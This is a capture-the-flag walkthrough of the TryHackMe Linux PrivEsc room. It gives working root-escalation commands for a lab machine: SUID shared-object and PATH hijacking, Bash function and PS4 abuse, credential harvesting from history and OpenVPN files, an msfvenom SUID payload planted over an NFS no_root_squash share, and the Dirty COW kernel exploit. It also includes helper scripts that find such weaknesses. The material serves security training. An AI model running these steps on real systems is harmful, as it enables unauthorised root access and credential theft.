TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2) : Benjamin Reitz
by: Benjamin Reitz
Post content copied from Finxter.
CHALLENGE OVERVIEW
![YouTube Video](https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FPEttn8l3lX8%2Fhqdefault.jpg)
- CTF Creator: Tib3rius
- Link: https://tryhackme.com/room/linuxprivesc
- Difficulty: medium
- Target: gaining root access using a variety of different techniques
- Highlight: Rooting a Linux machine using the famous Dirty Cow Kernel Exploit.
- Tags: privesc, linux, privilege escalation
BACKGROUND
Welcome back to part II of this Linux privilege escalation series. You can find part 1 of this mini-series here:
Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)
In this tutorial, we’ll try some additional “magical” methods of gaining root access in tasks 11-21. Buckle up, and let’s get to it!
TASK 11 SUID/SGID executables
After making sure that we have connected to the TryHackMe VPN with OpenVPN, let’s go ahead and search for all files that have a SUID or SGID bit:
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-374.png)
One of the SUID binaries in the listing is exim version 4.84-3. Let’s look it up on exploit-db.com to see if there are any known vulnerabilities for that version. There is a local root exploit!
To make this faster, TryHackMe has already preloaded our machine with the exploit file. Let’s execute it and see if we can grab root!
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-375.png)
TASK 12 SUID / SGID Executables – Shared Object Injection
In this privesc method we run the suid-so binary under strace and look for shared objects it tries to load but cannot find (open or access calls that return ENOENT, “No such file or directory”). A missing library in a directory we can write to is a library we can supply ourselves.
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-376.png)
The libcalc.so file should exist in the /home/user/.config/ directory, but it is missing, and that directory is in our own home, so we can write to it. Let’s compile the included C file into a shared object at that location with the command:
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
Now when we run the suid-so binary, the dynamic loader picks up our libcalc.so and runs its code with the binary’s root privileges, spawning a root shell.
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-377.png)
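The strace triage above can be scripted. The following is an added example written for this page, not code from the original walkthrough or from the room: it pulls every shared object that strace reported as missing out of the trace and then checks which of those live in a directory the current user can write to. The strace lines are constructed sample input modelled on what a binary like suid-so produces; the helper names `missing_shared_objects` and `hijackable` are my own.

```sh
# Added example (not from the original walkthrough): triage strace output for
# shared objects a SUID binary tried to load and could not find, then report
# the ones whose directory the current user can write to.  The strace lines
# are constructed sample input modelled on the room's suid-so binary; on a live
# target you would feed the real trace instead:
#   strace /usr/local/bin/suid-so 2>&1 | missing_shared_objects -
SAMPLE="$(mktemp)"
cat > "$SAMPLE" <<'EOF'
execve("/usr/local/bin/suid-so", ["/usr/local/bin/suid-so"], [/* 20 vars */]) = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
write(1, "Calculating something, please wait...\n", 38) = 38
EOF

# Print every path ending in .so (or .so.N...) that strace reported as ENOENT.
# Handles both open("path", ...) and openat(AT_FDCWD, "path", ...) forms; a
# file name of - reads standard input, so the function works in a pipeline.
missing_shared_objects() {
  sed -n 's/.*"\([^"]*\.so\(\.[0-9.]*\)\{0,1\}\)".*= -1 ENOENT.*/\1/p' "$1"
}

# Of those, keep the ones whose parent directory is writable by us: that is
# where a library of our own can be dropped for the loader to pick up.
hijackable() {
  for p in "$@"; do
    [ -w "$(dirname "$p")" ] && printf '%s\n' "$p"
  done
  return 0
}

echo "missing shared objects:"
missing_shared_objects "$SAMPLE"
# The writable check needs real directories, so demonstrate it on one we own
# (constructed under a temp dir) next to a path whose directory does not exist.
WORK="$(mktemp -d)"
mkdir -p "$WORK/.config"
echo "hijackable:"
hijackable "$WORK/.config/libcalc.so" /nonexistent-dir/libfoo.so
```

Note that `/etc/ld.so.nohwcap` is also reported as missing by the loader on Debian systems but is deliberately excluded: it is not a shared object, and being able to create it buys nothing. Only paths ending in `.so` or `.so.N` are candidates for injection.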
TASK 13 SUID / SGID Executables – Environment Variables
We’ll run strings to see a little more about the inner workings of the suid-env file.
strings /usr/local/bin/suid-env
We can see that the final step in this program is to start the apache2 service, and that it calls `service` by name rather than by its absolute path, so the binary runs whichever `service` is found first on PATH. We can hijack this by compiling a spoofed program with the same name that spawns a Bash shell.
gcc -o service /home/user/tools/suid/service.c
Finally, we prepend our current directory to the PATH variable when running the binary, so that our spoofed service file is found first:
PATH=.:$PATH /usr/local/bin/suid-env
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-378.png)
TASK 14 SUID / SGID Executables – Abusing Shell Features (#1)
In this task, we target the suid-env2 executable, which does the same thing as suid-env but calls service by its absolute path, /usr/sbin/service, so the PATH trick no longer applies. In Bash versions older than 4.2-048 it is possible to define shell functions whose names look like full paths and export them, and the exported function is then used instead of the actual executable at that path.
First, let’s check our bash version:
/bin/bash --version
And now, let’s create a Bash function named “/usr/sbin/service” that spawns a new Bash shell with the -p (privileged) option, so that Bash keeps the effective UID instead of dropping it.
function /usr/sbin/service { /bin/bash -p; }
And last but not least, let’s export this new function and then run the executable to get our root shell!
export -f /usr/sbin/service
/usr/local/bin/suid-env2
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-379.png)
TASK 15 SUID / SGID Executables – Abusing Shell Features (#2)
We’ll exploit another shell feature, this one only on Bash versions older than 4.4. Bash has a debugging mode (xtrace) that can be switched on by passing SHELLOPTS=xtrace in the environment with env, and in that mode Bash prints the PS4 variable in front of every traced command. PS4 is expanded like a prompt, so a command substitution placed in it is executed, here with the privileges of the SUID binary.
In the env command, we set PS4 to a command that copies /bin/bash to a new file /tmp/rootbash and gives that file +xs permissions (executable plus the SUID/SGID bits), then run suid-env2 so the copy happens as root, and finally run /tmp/rootbash -p to become root in the new shell. From Bash 4.4 onwards, PS4 is not expanded when the shell is running with elevated privileges, which is why the version matters.
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-380-895x1024.png)
TASK 16 Passwords & Keys – History Files
This is my favorite method in this whole list because of the simplicity of the hack.
We list the hidden history files in our home directory (.bash_history and friends) and page through them with less, looking for passwords that were typed on the command line and saved in plaintext. We find a MySQL command line containing the root password, and since the same password is reused for the root account, we can simply switch users to root.
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-381.png)
TASK 17 Passwords & Keys – Config Files
In this task, we examine an ovpn file to see if there are any references to a file holding credentials. We find them without much trouble!
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-382.png)
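Both of these finds (Tasks 16 and 17) come down to grepping files that users and services leave lying around. The script below is an added example written for this page, not code from the original walkthrough: it runs a small credential sweep over a history file and an OpenVPN config. The history lines, the .ovpn contents, the host names and the passwords in them are all constructed sample data, and the function names are my own.

```sh
# Added example (not from the original walkthrough): a quick credential sweep
# of the kind Tasks 16 and 17 do by eye, over a history file and an OpenVPN
# config.  Both files below are constructed sample data; on a target point the
# functions at ~/.*history and at any *.ovpn or openvpn/*.conf you can read.
WORK="$(mktemp -d)"
cat > "$WORK/.bash_history" <<'EOF'
ls -la
mysql -h db.example.local -uroot -pS3cretPass
cd /var/www
sshpass -p 'Hunter2!' ssh deploy@10.10.10.5
export DB_PASSWORD=changeme
echo "done"
EOF
cat > "$WORK/client.ovpn" <<'EOF'
client
dev tun
remote vpn.example.local 1194
auth-user-pass /etc/openvpn/auth.txt
EOF

# History lines that carry a secret on the command line: mysql's -p glued to
# its value, sshpass -p, or a PASS/PASSWD/PASSWORD assignment.
creds_in_history() {
  grep -E -i -- 'mysql .*-p[^ ]|sshpass +-p|pass(word|wd)?=' "$1" || true
}

# Files an OpenVPN config pulls credentials from: the argument of
# auth-user-pass (username/password) or askpass (private-key passphrase).
ovpn_credential_files() {
  awk '($1 == "auth-user-pass" || $1 == "askpass") && NF >= 2 { print $2 }' "$1"
}

echo "history hits:"
creds_in_history "$WORK/.bash_history"
echo "ovpn credential files:"
ovpn_credential_files "$WORK/client.ovpn"
```

The second function only tells you where OpenVPN expects to read the credentials; the follow-up, exactly as in Task 17, is to check whether that file is readable by you and cat it. The history pattern is deliberately loose, since a few false positives are cheaper than missing a password, and the same sweep is worth running over every home directory you can read, not just your own.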
TASK 18 Passwords & Keys – SSH Keys
In this task, I’ll identify and copy a hidden ssh key from the target machine.
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-383.png)
Next, over on my Kali attackbox, we paste the contents into a new file and change permissions to 600 before SSHing our way into the target machine as root!
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-384.png)
TASK 19 NFS
In this task, we’ll exploit the network file system by mounting it on our attackbox and changing permissions. First, let’s cat out /etc/exports to see what is mountable and which permissions we might be able to exploit.
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-385.png)
And here we see the infamous, exploitable “no_root_squash” option! Normally an NFS server maps the client’s root user to an unprivileged account (root squashing); with no_root_squash, files that root creates on the client keep root ownership on the server, so a root-owned SUID binary can be planted on the share.
Recommended: For further reading on exploiting no_root_squash on NFS, check out Hacking Network File System (NFS) – A TryHackMe Walkthrough
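Reading /etc/exports by eye is fine for one line, but the condition worth flagging is specific: an export that is both writable (rw) and not squashing root. The script below is an added example written for this page, not code from the original walkthrough; it parses an exports file and labels every client entry that has no_root_squash. The exports file is constructed sample data and the function name is my own.

```sh
# Added example (not from the original walkthrough): flag NFS exports that
# switch off root squashing, the condition Task 19 abuses, and say whether
# each one is also writable.  The exports file below is constructed sample
# data; on a target run the function against /etc/exports.
SAMPLE="$(mktemp)"
cat > "$SAMPLE" <<'EOF'
# /etc/exports: the access control list for filesystems which may be exported
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public *(ro,sync,no_root_squash,no_subtree_check)
/home 10.0.0.0/24(rw,sync,root_squash,no_subtree_check)
/var/backups 10.0.0.7(rw,sync,no_root_squash)
EOF

# Print "<mode> <export> <client>(<options>)" for every client entry whose
# options include no_root_squash.  exports(5) defaults to ro, so an entry is
# only WRITABLE when rw appears explicitly; a read-only no_root_squash export
# still leaks data but cannot be used to plant a SUID binary.
root_squash_off() {
  awk '
    /^[ \t]*(#|$)/ { next }                       # skip comments and blank lines
    {
      for (i = 2; i <= NF; i++) {                 # one field per client entry
        if (index($i, "no_root_squash") == 0) continue
        mode = "read-only"
        if (index($i, "(rw,") || index($i, ",rw,") || index($i, ",rw)") || index($i, "(rw)"))
          mode = "WRITABLE"
        printf "%s %s %s\n", mode, $1, $i
      }
    }' "$1"
}

root_squash_off "$SAMPLE"
```

The /home line is not reported even though it is rw, because root_squash (the default) is in effect there; the fix for the flagged lines is simply to drop no_root_squash and to restrict the client list from `*` to the hosts that actually need the share.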
First, let’s create a new mount point at /tmp/nfs on our attack machine.
mkdir /tmp/nfs
Now let’s mount the NFS share (10.10.10.10 stands for the target’s IP address).
mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs
Let’s create a malicious payload with msfvenom and place it in the NFS directory.
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
Because we are root on the attackbox and the share does not squash root, the file is owned by root on the target. Now let’s add the SUID and SGID bits so that running it spawns a root shell.
chmod +xs /tmp/nfs/shell.elf
The last step is to switch back to the target machine and run the ELF file to gain a root shell. The share is the target’s /tmp, so the file shows up there as /tmp/shell.elf.
/tmp/shell.elf
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-386.png)
TASK 20 Kernel Exploits
In the final task, we will find a known kernel exploit and run it to gain root access. Let’s start out by running the Linux exploit suggester 2 script to help us identify potential exploits.
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-387.png)
We’ll move ahead with option 3, the dirty_cow exploit (Dirty COW, CVE-2016-5195). Let’s compile it from the files already conveniently located on the machine.
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
And now we can run it and gain a root shell.
./c0w
![](https://blog.finxter.com/wp-content/uploads/2023/02/image-388.png)
TASK 21 Privilege Escalation Scripts
The three scripts for Linux privesc located on this machine are:
- LinEnum.sh
- linpeas.sh
- lse.sh
A full comparison of these scripts is out of the scope of this tutorial. If you’d like to see a detailed side-by-side analysis, please let me know, and I’ll add it to my list of future blog ideas.
FINAL THOUGHTS
Thanks for reading this write-up!
I’ve enjoyed trying out all of the different ways to privesc to root on Linux machines. It leaves me questioning my assumption that Linux machines are more secure than Windows or Mac machines.
It also reaffirms the importance of keeping operating systems up to date.
February 27, 2023 at 09:13PM